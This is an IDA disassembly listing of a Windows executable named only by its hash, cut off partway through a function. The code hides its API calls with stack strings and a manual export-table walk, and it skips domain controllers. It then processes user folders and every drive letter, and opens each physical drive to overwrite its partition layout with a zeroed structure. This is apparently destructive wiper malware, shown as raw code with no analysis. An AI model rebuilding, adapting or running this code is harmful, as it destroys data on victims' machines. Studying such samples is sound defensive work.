

;
; +-------------------------------------------------------------------------+
; |      This file was generated by The Interactive Disassembler (IDA)      |
; |           Copyright (c) 2023 Hex-Rays, <support@hex-rays.com>           |
; +-------------------------------------------------------------------------+
;
; Input SHA256 : A294620543334A721A2AE8EAAF9680A0786F4B9A216D75B55CFD28F39E9430EA
; Input MD5    : 42E52B8DAF63E6E26C3AA91E7E971492
; Input CRC32  : 11A104D8

; File Name   : C:\Users\Admin\Desktop\a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea.exe
; Format      : Portable executable for 80386 (PE)
; Imagebase   : 400000
; Timestamp   : 622EEC88 (Mon Mar 14 07:19:36 2022)
; Section 1. (virtual address 00001000)
; Virtual size                  : 00001B4A (   6986.)
; Section size in file          : 00001C00 (   7168.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment     : default

.686p
.mmx
.model flat


; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing


; Attributes: bp-based frame

public start
start proc near

var_68= dword ptr -68h
var_64= byte ptr -64h
var_63= byte ptr -63h
var_62= byte ptr -62h
var_61= byte ptr -61h
var_60= byte ptr -60h
var_5F= byte ptr -5Fh
var_5E= byte ptr -5Eh
var_5D= byte ptr -5Dh
var_5C= byte ptr -5Ch
var_5B= byte ptr -5Bh
var_5A= byte ptr -5Ah
var_59= byte ptr -59h
var_58= byte ptr -58h
var_54= byte ptr -54h
var_53= byte ptr -53h
var_52= byte ptr -52h
var_51= byte ptr -51h
var_50= byte ptr -50h
var_4F= byte ptr -4Fh
var_4E= byte ptr -4Eh
var_4D= byte ptr -4Dh
var_4C= byte ptr -4Ch
var_48= byte ptr -48h
var_47= byte ptr -47h
var_46= byte ptr -46h
var_45= byte ptr -45h
var_44= byte ptr -44h
var_43= byte ptr -43h
var_42= byte ptr -42h
var_41= byte ptr -41h
var_40= byte ptr -40h
var_3F= byte ptr -3Fh
var_3E= byte ptr -3Eh
var_3D= byte ptr -3Dh
var_3C= byte ptr -3Ch
Buffer= dword ptr -38h
var_34= dword ptr -34h
var_30= byte ptr -30h
var_2F= byte ptr -2Fh
var_2E= byte ptr -2Eh
var_2D= byte ptr -2Dh
var_2C= byte ptr -2Ch
var_2B= byte ptr -2Bh
var_2A= byte ptr -2Ah
var_29= byte ptr -29h
var_28= byte ptr -28h
var_27= byte ptr -27h
var_26= byte ptr -26h
var_25= byte ptr -25h
var_24= byte ptr -24h
var_20= byte ptr -20h
var_1F= byte ptr -1Fh
var_1E= byte ptr -1Eh
var_1D= byte ptr -1Dh
var_1C= byte ptr -1Ch
var_1B= byte ptr -1Bh
var_1A= byte ptr -1Ah
var_19= byte ptr -19h
var_18= byte ptr -18h
var_17= byte ptr -17h
var_16= byte ptr -16h
var_15= byte ptr -15h
var_14= byte ptr -14h
var_13= byte ptr -13h
var_12= byte ptr -12h
var_11= byte ptr -11h
var_10= byte ptr -10h
var_F= byte ptr -0Fh
var_E= byte ptr -0Eh
var_D= byte ptr -0Dh
var_C= byte ptr -0Ch
var_B= byte ptr -0Bh
var_A= byte ptr -0Ah
var_9= byte ptr -9
var_8= byte ptr -8
var_7= byte ptr -7
var_6= byte ptr -6
var_5= byte ptr -5
var_4= byte ptr -4
var_3= byte ptr -3

push    ebp
mov     ebp, esp
sub     esp, 68h
mov     [ebp+var_34], 0
mov     [ebp+var_1C], 6Bh ; 'k'
mov     [ebp+var_1B], 0
mov     [ebp+var_1A], 65h ; 'e'
mov     [ebp+var_19], 0
mov     [ebp+var_18], 72h ; 'r'
mov     [ebp+var_17], 0
mov     [ebp+var_16], 6Eh ; 'n'
mov     [ebp+var_15], 0
mov     [ebp+var_14], 65h ; 'e'
mov     [ebp+var_13], 0
mov     [ebp+var_12], 6Ch ; 'l'
mov     [ebp+var_11], 0
mov     [ebp+var_10], 33h ; '3'
mov     [ebp+var_F], 0
mov     [ebp+var_E], 32h ; '2'
mov     [ebp+var_D], 0
mov     [ebp+var_C], 2Eh ; '.'
mov     [ebp+var_B], 0
mov     [ebp+var_A], 64h ; 'd'
mov     [ebp+var_9], 0
mov     [ebp+var_8], 6Ch ; 'l'
mov     [ebp+var_7], 0
mov     [ebp+var_6], 6Ch ; 'l'
mov     [ebp+var_5], 0
mov     [ebp+var_4], 0
mov     [ebp+var_3], 0
mov     [ebp+var_48], 61h ; 'a'
mov     [ebp+var_47], 64h ; 'd'
mov     [ebp+var_46], 76h ; 'v'
mov     [ebp+var_45], 61h ; 'a'
mov     [ebp+var_44], 70h ; 'p'
mov     [ebp+var_43], 69h ; 'i'
mov     [ebp+var_42], 33h ; '3'
mov     [ebp+var_41], 32h ; '2'
mov     [ebp+var_40], 2Eh ; '.'
mov     [ebp+var_3F], 64h ; 'd'
mov     [ebp+var_3E], 6Ch ; 'l'
mov     [ebp+var_3D], 6Ch ; 'l'
mov     [ebp+var_3C], 0
mov     [ebp+var_30], 4Ch ; 'L'
mov     [ebp+var_2F], 6Fh ; 'o'
mov     [ebp+var_2E], 61h ; 'a'
mov     [ebp+var_2D], 64h ; 'd'
mov     [ebp+var_2C], 4Ch ; 'L'
mov     [ebp+var_2B], 69h ; 'i'
mov     [ebp+var_2A], 62h ; 'b'
mov     [ebp+var_29], 72h ; 'r'
mov     [ebp+var_28], 61h ; 'a'
mov     [ebp+var_27], 72h ; 'r'
mov     [ebp+var_26], 79h ; 'y'
mov     [ebp+var_25], 41h ; 'A'
mov     [ebp+var_24], 0
lea     eax, [ebp+var_30]
push    eax
lea     ecx, [ebp+var_1C]
push    ecx
call    sub_401530
add     esp, 8
mov     [ebp+var_34], eax
mov     [ebp+var_64], 6Eh ; 'n'
mov     [ebp+var_63], 65h ; 'e'
mov     [ebp+var_62], 74h ; 't'
mov     [ebp+var_61], 61h ; 'a'
mov     [ebp+var_60], 70h ; 'p'
mov     [ebp+var_5F], 69h ; 'i'
mov     [ebp+var_5E], 33h ; '3'
mov     [ebp+var_5D], 32h ; '2'
mov     [ebp+var_5C], 2Eh ; '.'
mov     [ebp+var_5B], 64h ; 'd'
mov     [ebp+var_5A], 6Ch ; 'l'
mov     [ebp+var_59], 6Ch ; 'l'
mov     [ebp+var_58], 0
lea     edx, [ebp+var_64]
push    edx
call    [ebp+var_34]
mov     [ebp+Buffer], 0
lea     eax, [ebp+Buffer]
push    eax             ; Buffer
push    1               ; InfoLevel
push    0               ; lpServer
call    ds:DsRoleGetPrimaryDomainInformation
mov     ecx, [ebp+Buffer]
cmp     dword ptr [ecx], 5
jnz     short loc_40114A
jmp     short loc_4011C4

loc_40114A:
lea     edx, [ebp+var_48]
push    edx
call    [ebp+var_34]
mov     [ebp+var_54], 43h ; 'C'
mov     [ebp+var_53], 3Ah ; ':'
mov     [ebp+var_52], 5Ch ; '\'
mov     [ebp+var_51], 55h ; 'U'
mov     [ebp+var_50], 73h ; 's'
mov     [ebp+var_4F], 65h ; 'e'
mov     [ebp+var_4E], 72h ; 'r'
mov     [ebp+var_4D], 73h ; 's'
mov     [ebp+var_4C], 0
lea     eax, [ebp+var_54]
push    eax
call    sub_4022A0
add     esp, 4
mov     [ebp+var_20], 44h ; 'D'
mov     [ebp+var_1F], 3Ah ; ':'
mov     [ebp+var_1E], 5Ch ; '\'
mov     [ebp+var_1D], 0
mov     [ebp+var_68], 0
jmp     short loc_4011A3

loc_40119A:
mov     ecx, [ebp+var_68]
add     ecx, 1
mov     [ebp+var_68], ecx

loc_4011A3:
cmp     [ebp+var_68], 18h
jnb     short loc_4011BF
lea     edx, [ebp+var_20]
push    edx
call    sub_4022A0
add     esp, 4
mov     al, [ebp+var_20]
add     al, 1
mov     [ebp+var_20], al
jmp     short loc_40119A

loc_4011BF:
call    sub_4011D0

loc_4011C4:
mov     esp, ebp
pop     ebp
retn
start endp

align 10h


; Attributes: bp-based frame

sub_4011D0 proc near

var_80C= dword ptr -80Ch
var_808= dword ptr -808h
var_804= dword ptr -804h
var_800= byte ptr -800h
var_7FF= byte ptr -7FFh
var_7FE= byte ptr -7FEh
var_7FD= byte ptr -7FDh
var_7FC= byte ptr -7FCh
var_7FB= byte ptr -7FBh
var_7FA= byte ptr -7FAh
var_7F9= byte ptr -7F9h
var_7F8= byte ptr -7F8h
var_7F7= byte ptr -7F7h
var_7F6= byte ptr -7F6h
var_7F5= byte ptr -7F5h
var_7F4= dword ptr -7F4h
var_7F0= byte ptr -7F0h
var_6C= dword ptr -6Ch
var_68= byte ptr -68h
var_67= byte ptr -67h
var_66= byte ptr -66h
var_65= byte ptr -65h
var_64= byte ptr -64h
var_63= byte ptr -63h
var_62= byte ptr -62h
var_61= byte ptr -61h
var_60= byte ptr -60h
var_5F= byte ptr -5Fh
var_5E= byte ptr -5Eh
var_5D= byte ptr -5Dh
var_5C= byte ptr -5Ch
var_5B= byte ptr -5Bh
var_5A= byte ptr -5Ah
var_59= byte ptr -59h
var_58= byte ptr -58h
var_57= byte ptr -57h
var_56= byte ptr -56h
var_55= byte ptr -55h
var_54= byte ptr -54h
var_53= byte ptr -53h
var_52= byte ptr -52h
var_51= byte ptr -51h
var_50= byte ptr -50h
var_4F= byte ptr -4Fh
var_4E= byte ptr -4Eh
var_4D= byte ptr -4Dh
var_4C= byte ptr -4Ch
var_4B= byte ptr -4Bh
var_4A= byte ptr -4Ah
var_49= byte ptr -49h
var_48= byte ptr -48h
var_47= byte ptr -47h
var_46= byte ptr -46h
var_45= byte ptr -45h
var_44= byte ptr -44h
var_43= byte ptr -43h
var_40= byte ptr -40h
var_3F= byte ptr -3Fh
var_3E= byte ptr -3Eh
var_3D= byte ptr -3Dh
var_3C= byte ptr -3Ch
var_3B= byte ptr -3Bh
var_3A= byte ptr -3Ah
var_39= byte ptr -39h
var_38= byte ptr -38h
var_37= byte ptr -37h
var_36= byte ptr -36h
var_35= byte ptr -35h
var_34= byte ptr -34h
var_33= byte ptr -33h
var_32= byte ptr -32h
var_31= byte ptr -31h
var_30= byte ptr -30h
var_2F= byte ptr -2Fh
var_2E= byte ptr -2Eh
var_2D= byte ptr -2Dh
var_2C= byte ptr -2Ch
var_2B= byte ptr -2Bh
var_2A= byte ptr -2Ah
var_29= byte ptr -29h
var_28= byte ptr -28h
var_27= byte ptr -27h
var_26= byte ptr -26h
var_25= byte ptr -25h
var_24= byte ptr -24h
var_23= byte ptr -23h
var_22= byte ptr -22h
var_21= byte ptr -21h
var_20= byte ptr -20h
var_1F= byte ptr -1Fh
var_1E= byte ptr -1Eh
var_1D= byte ptr -1Dh
var_1C= byte ptr -1Ch
var_1B= byte ptr -1Bh
var_1A= byte ptr -1Ah
var_19= byte ptr -19h
var_18= byte ptr -18h
var_17= byte ptr -17h
var_16= byte ptr -16h
var_15= byte ptr -15h
var_14= byte ptr -14h
var_13= byte ptr -13h
var_12= byte ptr -12h
var_11= byte ptr -11h
var_10= byte ptr -10h
var_F= byte ptr -0Fh
var_E= byte ptr -0Eh
var_D= byte ptr -0Dh
var_C= byte ptr -0Ch
var_B= byte ptr -0Bh
var_8= dword ptr -8
var_4= dword ptr -4

push    ebp
mov     ebp, esp
sub     esp, 80Ch
mov     [ebp+var_6C], 0
mov     [ebp+var_804], 0
mov     [ebp+var_40], 44h ; 'D'
mov     [ebp+var_3F], 65h ; 'e'
mov     [ebp+var_3E], 76h ; 'v'
mov     [ebp+var_3D], 69h ; 'i'
mov     [ebp+var_3C], 63h ; 'c'
mov     [ebp+var_3B], 65h ; 'e'
mov     [ebp+var_3A], 49h ; 'I'
mov     [ebp+var_39], 6Fh ; 'o'
mov     [ebp+var_38], 43h ; 'C'
mov     [ebp+var_37], 6Fh ; 'o'
mov     [ebp+var_36], 6Eh ; 'n'
mov     [ebp+var_35], 74h ; 't'
mov     [ebp+var_34], 72h ; 'r'
mov     [ebp+var_33], 6Fh ; 'o'
mov     [ebp+var_32], 6Ch ; 'l'
mov     [ebp+var_31], 0
mov     [ebp+var_24], 6Bh ; 'k'
mov     [ebp+var_23], 0
mov     [ebp+var_22], 65h ; 'e'
mov     [ebp+var_21], 0
mov     [ebp+var_20], 72h ; 'r'
mov     [ebp+var_1F], 0
mov     [ebp+var_1E], 6Eh ; 'n'
mov     [ebp+var_1D], 0
mov     [ebp+var_1C], 65h ; 'e'
mov     [ebp+var_1B], 0
mov     [ebp+var_1A], 6Ch ; 'l'
mov     [ebp+var_19], 0
mov     [ebp+var_18], 33h ; '3'
mov     [ebp+var_17], 0
mov     [ebp+var_16], 32h ; '2'
mov     [ebp+var_15], 0
mov     [ebp+var_14], 2Eh ; '.'
mov     [ebp+var_13], 0
mov     [ebp+var_12], 64h ; 'd'
mov     [ebp+var_11], 0
mov     [ebp+var_10], 6Ch ; 'l'
mov     [ebp+var_F], 0
mov     [ebp+var_E], 6Ch ; 'l'
mov     [ebp+var_D], 0
mov     [ebp+var_C], 0
mov     [ebp+var_B], 0
mov     [ebp+var_30], 43h ; 'C'
mov     [ebp+var_2F], 72h ; 'r'
mov     [ebp+var_2E], 65h ; 'e'
mov     [ebp+var_2D], 61h ; 'a'
mov     [ebp+var_2C], 74h ; 't'
mov     [ebp+var_2B], 65h ; 'e'
mov     [ebp+var_2A], 46h ; 'F'
mov     [ebp+var_29], 69h ; 'i'
mov     [ebp+var_28], 6Ch ; 'l'
mov     [ebp+var_27], 65h ; 'e'
mov     [ebp+var_26], 57h ; 'W'
mov     [ebp+var_25], 0
lea     eax, [ebp+var_30]
push    eax
lea     ecx, [ebp+var_24]
push    ecx
call    sub_401530
add     esp, 8
mov     [ebp+var_804], eax
lea     edx, [ebp+var_40]
push    edx
lea     eax, [ebp+var_24]
push    eax
call    sub_401530
add     esp, 8
mov     [ebp+var_6C], eax
mov     [ebp+var_8], 0
mov     [ebp+var_800], 43h ; 'C'
mov     [ebp+var_7FF], 6Ch ; 'l'
mov     [ebp+var_7FE], 6Fh ; 'o'
mov     [ebp+var_7FD], 73h ; 's'
mov     [ebp+var_7FC], 65h ; 'e'
mov     [ebp+var_7FB], 48h ; 'H'
mov     [ebp+var_7FA], 61h ; 'a'
mov     [ebp+var_7F9], 6Eh ; 'n'
mov     [ebp+var_7F8], 64h ; 'd'
mov     [ebp+var_7F7], 6Ch ; 'l'
mov     [ebp+var_7F6], 65h ; 'e'
mov     [ebp+var_7F5], 0
lea     ecx, [ebp+var_800]
push    ecx
lea     edx, [ebp+var_24]
push    edx
call    sub_401530
add     esp, 8
mov     [ebp+var_8], eax
mov     [ebp+var_7F4], 9
mov     [ebp+var_808], 0
mov     [ebp+var_4], 0FFFFFFFFh
push    780h
lea     eax, [ebp+var_7F0]
push    eax
call    sub_402B10
add     esp, 8
mov     [ebp+var_68], 5Ch ; '\'
mov     [ebp+var_67], 0
mov     [ebp+var_66], 5Ch ; '\'
mov     [ebp+var_65], 0
mov     [ebp+var_64], 2Eh ; '.'
mov     [ebp+var_63], 0
mov     [ebp+var_62], 5Ch ; '\'
mov     [ebp+var_61], 0
mov     [ebp+var_60], 50h ; 'P'
mov     [ebp+var_5F], 0
mov     [ebp+var_5E], 48h ; 'H'
mov     [ebp+var_5D], 0
mov     [ebp+var_5C], 59h ; 'Y'
mov     [ebp+var_5B], 0
mov     [ebp+var_5A], 53h ; 'S'
mov     [ebp+var_59], 0
mov     [ebp+var_58], 49h ; 'I'
mov     [ebp+var_57], 0
mov     [ebp+var_56], 43h ; 'C'
mov     [ebp+var_55], 0
mov     [ebp+var_54], 41h ; 'A'
mov     [ebp+var_53], 0
mov     [ebp+var_52], 4Ch ; 'L'
mov     [ebp+var_51], 0
mov     [ebp+var_50], 44h ; 'D'
mov     [ebp+var_4F], 0
mov     [ebp+var_4E], 52h ; 'R'
mov     [ebp+var_4D], 0
mov     [ebp+var_4C], 49h ; 'I'
mov     [ebp+var_4B], 0
mov     [ebp+var_4A], 56h ; 'V'
mov     [ebp+var_49], 0
mov     [ebp+var_48], 45h ; 'E'
mov     [ebp+var_47], 0
mov     [ebp+var_46], 39h ; '9'
mov     [ebp+var_45], 0
mov     [ebp+var_44], 0
mov     [ebp+var_43], 0

loc_401423:
lea     ecx, [ebp+var_68]
mov     [ebp+var_80C], ecx
push    0
push    80h
push    3
push    0
push    3
push    0C0000000h
mov     edx, [ebp+var_80C]
push    edx
call    [ebp+var_804]
mov     [ebp+var_4], eax
cmp     [ebp+var_4], 0FFFFFFFFh
jz      short loc_401480
push    0
lea     eax, [ebp+var_808]
push    eax
push    0
push    0
push    780h
lea     ecx, [ebp+var_7F0]
push    ecx
push    7C054h
mov     edx, [ebp+var_4]
push    edx
call    [ebp+var_6C]
mov     eax, [ebp+var_4]
push    eax
call    [ebp+var_8]

loc_401480:
mov     cl, [ebp+var_46]
mov     [ebp+var_46], cl
mov     dl, [ebp+var_46]
sub     dl, 1
mov     [ebp+var_46], dl
mov     eax, [ebp+var_7F4]
mov     ecx, [ebp+var_7F4]
sub     ecx, 1
mov     [ebp+var_7F4], ecx
test    eax, eax
jnz     loc_401423
mov     esp, ebp
pop     ebp
retn
sub_4011D0 endp



; Attributes: bp-based frame

sub_4014B0 proc near

var_9= byte ptr -9
var_8= dword ptr -8
var_4= dword ptr -4
arg_0= dword ptr  8
arg_4= dword ptr  0Ch

push    ebp
mov     ebp, esp
sub     esp, 0Ch
mov     eax, [ebp+arg_0]
mov     [ebp+var_4], eax
jmp     short loc_4014C7

loc_4014BE:
mov     ecx, [ebp+var_4]
add     ecx, 1
mov     [ebp+var_4], ecx

loc_4014C7:
mov     edx, [ebp+arg_0]
add     edx, [ebp+arg_4]
cmp     [ebp+var_4], edx
jnb     short loc_401501
mov     eax, [ebp+var_4]
mov     [ebp+var_8], eax
mov     ecx, [ebp+var_8]
mov     dl, [ecx]
mov     [ebp+var_9], dl
movsx   eax, [ebp+var_9]
cmp     eax, 41h ; 'A'
jl      short loc_4014FF
movsx   ecx, [ebp+var_9]
cmp     ecx, 5Ah ; 'Z'
jg      short loc_4014FF
mov     edx, [ebp+var_8]
mov     eax, [edx]
add     eax, 20h ; ' '
mov     ecx, [ebp+var_8]
mov     [ecx], eax

loc_4014FF:
jmp     short loc_4014BE

loc_401501:
mov     esp, ebp
pop     ebp
retn
sub_4014B0 endp

align 10h


; Attributes: bp-based frame

sub_401510 proc near

var_4= dword ptr -4
arg_0= dword ptr  8

push    ebp
mov     ebp, esp
push    ecx
mov     eax, [ebp+arg_0]
mov     ecx, [eax+3Ch]
add     ecx, [ebp+arg_0]
mov     [ebp+var_4], ecx
mov     edx, [ebp+var_4]
mov     eax, [edx+78h]
mov     esp, ebp
pop     ebp
retn
sub_401510 endp

align 10h


; Attributes: bp-based frame

sub_401530 proc near

var_70= dword ptr -70h
var_6C= dword ptr -6Ch
var_66= byte ptr -66h
var_65= byte ptr -65h
var_64= dword ptr -64h
var_60= dword ptr -60h
var_5C= dword ptr -5Ch
var_58= dword ptr -58h
var_54= word ptr -54h
var_52= word ptr -52h
var_50= dword ptr -50h
var_4C= dword ptr -4Ch
var_48= dword ptr -48h
var_42= word ptr -42h
var_40= dword ptr -40h
var_3C= dword ptr -3Ch
var_38= dword ptr -38h
var_34= dword ptr -34h
var_30= dword ptr -30h
var_2C= dword ptr -2Ch
var_28= dword ptr -28h
var_24= dword ptr -24h
var_20= dword ptr -20h
var_1C= dword ptr -1Ch
var_18= dword ptr -18h
var_14= dword ptr -14h
var_10= dword ptr -10h
var_C= dword ptr -0Ch
var_8= dword ptr -8
var_4= dword ptr -4
arg_0= dword ptr  8
arg_4= dword ptr  0Ch

push    ebp
mov     ebp, esp
sub     esp, 70h
mov     [ebp+var_8], 0
mov     [ebp+var_14], 0
mov     eax, large fs:30h
mov     [ebp+var_14], eax
mov     ecx, [ebp+var_14]
mov     edx, [ecx+0Ch]
mov     eax, [edx+14h]
mov     [ebp+var_C], eax
mov     [ebp+var_10], 0
mov     [ebp+var_18], 0
mov     [ebp+var_4], 0
mov     [ebp+var_1C], 0

loc_401575:
mov     ecx, [ebp+var_C]
mov     edx, [ecx+28h]
mov     [ebp+var_4], edx
mov     eax, [ebp+var_4]
mov     [ebp+var_3C], eax
mov     ecx, [ebp+var_3C]
add     ecx, 2
mov     [ebp+var_40], ecx

loc_40158D:
mov     edx, [ebp+var_3C]
mov     ax, [edx]
mov     [ebp+var_42], ax
add     [ebp+var_3C], 2
cmp     [ebp+var_42], 0
jnz     short loc_40158D
mov     ecx, [ebp+var_3C]
sub     ecx, [ebp+var_40]
sar     ecx, 1
mov     [ebp+var_48], ecx
mov     edx, [ebp+var_48]
shl     edx, 1
push    edx
mov     eax, [ebp+var_4]
push    eax
call    sub_4014B0
add     esp, 8
mov     ecx, [ebp+arg_0]
mov     [ebp+var_4C], ecx
mov     edx, [ebp+var_4]
mov     [ebp+var_50], edx

loc_4015CB:
mov     eax, [ebp+var_50]
mov     cx, [eax]
mov     [ebp+var_52], cx
mov     edx, [ebp+var_4C]
cmp     cx, [edx]
jnz     short loc_401610
cmp     [ebp+var_52], 0
jz      short loc_401607
mov     eax, [ebp+var_50]
mov     cx, [eax+2]
mov     [ebp+var_54], cx
mov     edx, [ebp+var_4C]
cmp     cx, [edx+2]
jnz     short loc_401610
add     [ebp+var_50], 4
add     [ebp+var_4C], 4
cmp     [ebp+var_54], 0
jnz     short loc_4015CB

loc_401607:
mov     [ebp+var_58], 0
jmp     short loc_401618

loc_401610:
sbb     eax, eax
sbb     eax, 0FFFFFFFFh
mov     [ebp+var_58], eax

loc_401618:
mov     ecx, [ebp+var_58]
mov     [ebp+var_5C], ecx
cmp     [ebp+var_5C], 0
jnz     loc_401726
mov     edx, [ebp+var_C]
mov     eax, [edx+10h]
mov     [ebp+var_10], eax
mov     ecx, [ebp+var_10]
push    ecx
call    sub_401510
add     esp, 4
mov     [ebp+var_18], eax
cmp     [ebp+var_18], 0
jz      loc_401726
mov     edx, [ebp+var_10]
add     edx, [ebp+var_18]
mov     [ebp+var_34], edx
mov     eax, [ebp+var_34]
mov     ecx, [eax+18h]
mov     [ebp+var_30], ecx
mov     edx, [ebp+var_34]
mov     eax, [edx+1Ch]
add     eax, [ebp+var_10]
mov     [ebp+var_20], eax
mov     ecx, [ebp+var_34]
mov     edx, [ecx+20h]
add     edx, [ebp+var_10]
mov     [ebp+var_24], edx
mov     eax, [ebp+var_34]
mov     ecx, [eax+24h]
add     ecx, [ebp+var_10]
mov     [ebp+var_28], ecx
mov     [ebp+var_2C], 0

loc_401687:
mov     edx, [ebp+var_30]
sub     edx, 1
mov     [ebp+var_30], edx
mov     eax, [ebp+var_30]
mov     ecx, [ebp+var_24]
lea     edx, [ecx+eax*4]
mov     [ebp+var_38], edx
mov     eax, [ebp+var_38]
mov     ecx, [eax]
add     ecx, [ebp+var_10]
mov     [ebp+var_2C], ecx
mov     edx, [ebp+arg_4]
mov     [ebp+var_60], edx
mov     eax, [ebp+var_2C]
mov     [ebp+var_64], eax

loc_4016B3:
mov     ecx, [ebp+var_64]
mov     dl, [ecx]
mov     [ebp+var_65], dl
mov     eax, [ebp+var_60]
cmp     dl, [eax]
jnz     short loc_4016F0
cmp     [ebp+var_65], 0
jz      short loc_4016E7
mov     ecx, [ebp+var_64]
mov     dl, [ecx+1]
mov     [ebp+var_66], dl
mov     eax, [ebp+var_60]
cmp     dl, [eax+1]
jnz     short loc_4016F0
add     [ebp+var_64], 2
add     [ebp+var_60], 2
cmp     [ebp+var_66], 0
jnz     short loc_4016B3

loc_4016E7:
mov     [ebp+var_6C], 0
jmp     short loc_4016F8

loc_4016F0:
sbb     ecx, ecx
sbb     ecx, 0FFFFFFFFh
mov     [ebp+var_6C], ecx

loc_4016F8:
mov     edx, [ebp+var_6C]
mov     [ebp+var_70], edx
cmp     [ebp+var_70], 0
jnz     short loc_40171C
mov     eax, [ebp+var_30]
mov     ecx, [ebp+var_28]
movzx   edx, word ptr [ecx+eax*2]
mov     eax, [ebp+var_20]
mov     ecx, [ebp+var_10]
add     ecx, [eax+edx*4]
mov     [ebp+var_8], ecx
jmp     short loc_401726

loc_40171C:
cmp     [ebp+var_30], 0
jnz     loc_401687

loc_401726:
mov     edx, [ebp+var_C]
mov     eax, [edx]
mov     [ebp+var_C], eax
mov     ecx, [ebp+var_C]
mov     edx, [ecx+10h]
mov     [ebp+var_10], edx
cmp     [ebp+var_10], 0
jz      short loc_401747
cmp     [ebp+var_8], 0
jz      loc_401575

loc_401747:
mov     eax, [ebp+var_8]
mov     esp, ebp
pop     ebp
retn
sub_401530 endp

align 10h


; Attributes: bp-based frame

sub_401750 proc near

var_9C= dword ptr -9Ch
var_98= dword ptr -98h
var_94= dword ptr -94h
var_90= dword ptr -90h
var_8C= byte ptr -8Ch
var_8B= byte ptr -8Bh
var_8A= byte ptr -8Ah
var_89= byte ptr -89h
var_88= byte ptr -88h
var_87= byte ptr -87h
var_86= byte ptr -86h
var_85= byte ptr -85h
var_84= byte ptr -84h
var_83= byte ptr -83h
var_82= byte ptr -82h
var_81= byte ptr -81h
var_80= byte ptr -80h
var_7F= byte ptr -7Fh
var_7E= byte ptr -7Eh
var_7D= byte ptr -7Dh
var_7C= byte ptr -7Ch
var_7B= byte ptr -7Bh
var_7A= byte ptr -7Ah
var_79= byte ptr -79h
var_78= byte ptr -78h
var_77= byte ptr -77h
var_76= byte ptr -76h
var_75= byte ptr -75h
var_74= byte ptr -74h
var_73= byte ptr -73h
var_70= byte ptr -70h
var_6F= byte ptr -6Fh
var_6E= byte ptr -6Eh
var_6D= byte ptr -6Dh
var_6C= byte ptr -6Ch
var_6B= byte ptr -6Bh
var_6A= byte ptr -6Ah
var_69= byte ptr -69h
var_68= byte ptr -68h
var_67= byte ptr -67h
var_66= byte ptr -66h
var_65= byte ptr -65h
var_64= byte ptr -64h
var_63= byte ptr -63h
var_62= byte ptr -62h
var_61= byte ptr -61h
var_60= byte ptr -60h
var_5F= byte ptr -5Fh
var_5E= byte ptr -5Eh
var_5D= byte ptr -5Dh
var_5C= byte ptr -5Ch
var_5B= byte ptr -5Bh
var_58= dword ptr -58h
var_54= dword ptr -54h
var_50= dword ptr -50h
var_4C= dword ptr -4Ch
var_48= byte ptr -48h
var_47= byte ptr -47h
var_46= byte ptr -46h
var_45= byte ptr -45h
var_44= byte ptr -44h
var_43= byte ptr -43h
var_42= byte ptr -42h
var_41= byte ptr -41h
var_40= byte ptr -40h
var_3F= byte ptr -3Fh
var_3E= byte ptr -3Eh
var_3D= byte ptr -3Dh
var_3C= byte ptr -3Ch
var_3B= byte ptr -3Bh
var_3A= byte ptr -3Ah
var_39= byte ptr -39h
var_38= byte ptr -38h
var_37= byte ptr -37h
var_36= byte ptr -36h
var_35= byte ptr -35h
var_34= byte ptr -34h
var_33= byte ptr -33h
var_30= dword ptr -30h
var_2C= byte ptr -2Ch
var_2B= byte ptr -2Bh
var_2A= byte ptr -2Ah
var_29= byte ptr -29h
var_28= byte ptr -28h
var_27= byte ptr -27h
var_26= byte ptr -26h
var_25= byte ptr -25h
var_24= byte ptr -24h
var_23= byte ptr -23h
var_22= byte ptr -22h
var_21= byte ptr -21h
var_20= byte ptr -20h
var_1C= byte ptr -1Ch
var_1B= byte ptr -1Bh
var_1A= byte ptr -1Ah
var_19= byte ptr -19h
var_18= byte ptr -18h
var_17= byte ptr -17h
var_16= byte ptr -16h
var_15= byte ptr -15h
var_14= byte ptr -14h
var_13= byte ptr -13h
var_12= byte ptr -12h
var_11= byte ptr -11h
var_10= byte ptr -10h
var_F= byte ptr -0Fh
var_E= byte ptr -0Eh
var_D= byte ptr -0Dh
var_C= byte ptr -0Ch
var_B= byte ptr -0Bh
var_A= byte ptr -0Ah
var_9= byte ptr -9
var_8= byte ptr -8
var_7= byte ptr -7
var_6= byte ptr -6
var_5= byte ptr -5
var_4= byte ptr -4
var_3= byte ptr -3
arg_0= dword ptr  8
arg_4= dword ptr  0Ch
arg_8= dword ptr  10h

push    ebp
mov     ebp, esp
sub     esp, 9Ch
mov     [ebp+var_30], 0
mov     [ebp+var_8C], 61h ; 'a'
mov     [ebp+var_8B], 0
mov     [ebp+var_8A], 64h ; 'd'
mov     [ebp+var_89], 0
mov     [ebp+var_88], 76h ; 'v'
mov     [ebp+var_87], 0
mov     [ebp+var_86], 61h ; 'a'
mov     [ebp+var_85], 0
mov     [ebp+var_84], 70h ; 'p'
mov     [ebp+var_83], 0
mov     [ebp+var_82], 69h ; 'i'
mov     [ebp+var_81], 0
mov     [ebp+var_80], 33h ; '3'
mov     [ebp+var_7F], 0
mov     [ebp+var_7E], 32h ; '2'
mov     [ebp+var_7D], 0
mov     [ebp+var_7C], 2Eh ; '.'
mov     [ebp+var_7B], 0
mov     [ebp+var_7A], 64h ; 'd'
mov     [ebp+var_79], 0
mov     [ebp+var_78], 6Ch ; 'l'
mov     [ebp+var_77], 0
mov     [ebp+var_76], 6Ch ; 'l'
mov     [ebp+var_75], 0
mov     [ebp+var_74], 0
mov     [ebp+var_73], 0
mov     [ebp+var_70], 4Ch ; 'L'
mov     [ebp+var_6F], 6Fh ; 'o'
mov     [ebp+var_6E], 6Fh ; 'o'
mov     [ebp+var_6D], 6Bh ; 'k'
mov     [ebp+var_6C], 75h ; 'u'
mov     [ebp+var_6B], 70h ; 'p'
mov     [ebp+var_6A], 50h ; 'P'
mov     [ebp+var_69], 72h ; 'r'
mov     [ebp+var_68], 69h ; 'i'
mov     [ebp+var_67], 76h ; 'v'
mov     [ebp+var_66], 69h ; 'i'
mov     [ebp+var_65], 6Ch ; 'l'
mov     [ebp+var_64], 65h ; 'e'
mov     [ebp+var_63], 67h ; 'g'
mov     [ebp+var_62], 65h ; 'e'
mov     [ebp+var_61], 56h ; 'V'
mov     [ebp+var_60], 61h ; 'a'
